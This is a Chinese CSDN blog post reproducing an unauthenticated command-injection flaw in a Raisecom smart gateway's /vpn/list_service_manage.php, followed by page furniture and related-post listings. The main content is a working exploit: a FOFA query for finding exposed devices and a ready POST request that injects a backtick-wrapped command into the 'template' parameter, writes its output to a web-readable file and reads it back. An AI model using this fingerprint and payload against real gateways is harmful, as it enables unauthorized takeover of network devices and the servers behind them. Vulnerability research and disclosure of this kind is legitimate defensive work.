某智能网关 list_service_manage存在命令执行漏洞

于 2024-09-10 08:26:48 发布
阅读量165 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/142077972
版权

漏洞描述

瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞,攻击者利用可获取服务器权限。

资产信息

FOFA:

body="/images/raisecom/back.gif"

漏洞复现

poc

POST /vpn/list_service_manage.php?template=%60whoami%3E%2Fwww%2Ftmp%2F1.txt%60 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded


Nradius_submit=true

 

 访问文件url+/tmp/1.txt获取命令回显

 

 

天官赐福万无禁忌
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-21 3274
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
漏洞复现】某某康达vpn/list_base_config.php 远程命令执行漏洞 RCE 带批量POC
qq_48368964的博客
08-19 401
网络设备是支撑计算机网络运行的重要硬件,包括路由器、交换机、网桥、网卡、集线器、防火墙、调制解调器和无线接入点等。路由器负责网络间的数据转发和地址转换,交换机用于局域网内设备的互联和数据交换,网桥连接不同网段实现互通,网卡提供有线或无线网络接口。某某康达vpn,其接口list_base_config.php存在命令执行漏洞,攻击者可通过该漏洞获取系统权限。构造数据包,执行curl命令访问DNSLog生产的domain。1.使用DNSLog.cn获取一个Domain。3.DNSLog获取服务器的IP地址。
HW漏洞威胁情报第六天|HW情报
weixin_43167326的博客
07-30 401
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1805
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
Xq+3vg==网关远程命令注入
xc_214的博客
08-23 267
Xq+3vg==智能网关list_service_manage.php存在未授权远程命令注入漏洞,攻击者利用可获取服务器权限。关闭互联网暴露面或接口设置访问权限。
wordpress漏洞工具_40个有用的工具来管理和发展您的WordPress博客(已更新)
09-08 773
We are often asked by our users about what tools we use to manage and grow our WordPress blogs. We have listed some of them in our WPBeginner Blueprint, but there are some more that we use on our diff...
网络攻防 横向移动_网络安全101的数据分析:检测横向移动
weixin_26722031的博客
07-31 2077
网络攻防 横向移动This is the second part of a series of blog posts. You can read the first one on Data Exfiltration. 这是一系列博客文章的第二部分。 您可以阅读有关数据渗透的第一篇文章。 This blog post is structured as follows: 该博客文章的结构如下: I...
Notes Twelfth Day-渗透攻击-红队-命令与控制
热门推荐
qq_34801745的博客
09-28 1万+
** Notes Twelfth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-28 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好
wireless_ultimate技术所得
张同学
03-26 661
-----------无线技术的特点 安全性不高 802.11标准 IEEE 国际电器电子工程师协会 由通信航天生物电器电子等方面的科学家组成 IEEE 分为不同的技术委员会 其中802委员负责LAN MAN(城愈往)标准的制定 802.1 802.2 802.3乙太网 … 802.6 MAN … 802.11 Wireless LAN(WLAN) -------------802.11 标准 802.11 属于数据链路层 802.11a 802.11b 802.11c 802.11d 802.11e 80
55Ge5pav5bq36L6+5pm66IO9572R5YWzIA== RCE漏洞复现
0xSec
08-23 546
网关设备存在前台RCE漏洞,攻击者可利用此漏洞写入后门文,获取服务器权限
安全牛学习笔记】中间人攻击、ARP MITM、中间人攻击、Pass the Hash
edu_aqniu的博客
10-11 3980
中间人攻击                                       Ettercap                                             - 统一的中间人攻击工具                           - 转发MAC与本机相同,但IP与本机不同的数据包     - 支持SSH1、SSL中间人攻击    
SpringCloud 微服务工具集v1.1
qq_40508488的博客
03-19 709
SpringCloud 微服务工具集v1.1 版本: Hoxton SR6 1.什么是微服务 官网: https://www.martinfowler.com/articles/microservices.html In short, the microservice architectural style is an approach to developing a single application as a suite of small services, each running in i
零信任安全:重新思考数字世界的访问
网络研究观
09-09 572
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1248
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
网站安全需求分析与安全保护工程
最新发布
weixin_49171105的博客
09-09 308
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 383
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
亚信安全出席第五届国际反病毒大会 探究AI现代网络勒索治理
亚信安全官方账号的博客
09-09 289
亚信安全出席活动并发表题为《AI时代下现代网络勒索治理》的演讲
供方软件供应链安全保障要求及开源场景对照自评表(上)
LJQClqjc的博客
09-09 191
开源软件供应链作为软件供应链的一种特殊形式,该国标亦适用于指导开源软件供应链中的供需双方开展组织管理和供应活动管理,增强开源软件供应链组织管理和供应活动管理能力,防范供应链导致的开源软件产品及其生命周期中断类的供应关系风险,防止供应活动在开源软件及其生命周期服务中引入新的技术安全风险和知识产权风险(例如:防止供应活动引入的软件漏洞、后门、篡改、伪造、许可协议不合规等),保障业务持续稳定安全运行。以下根据我们的分析研究,对国标中与开源供应链安全直接相关的内容进行识别与分析,供业内参考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值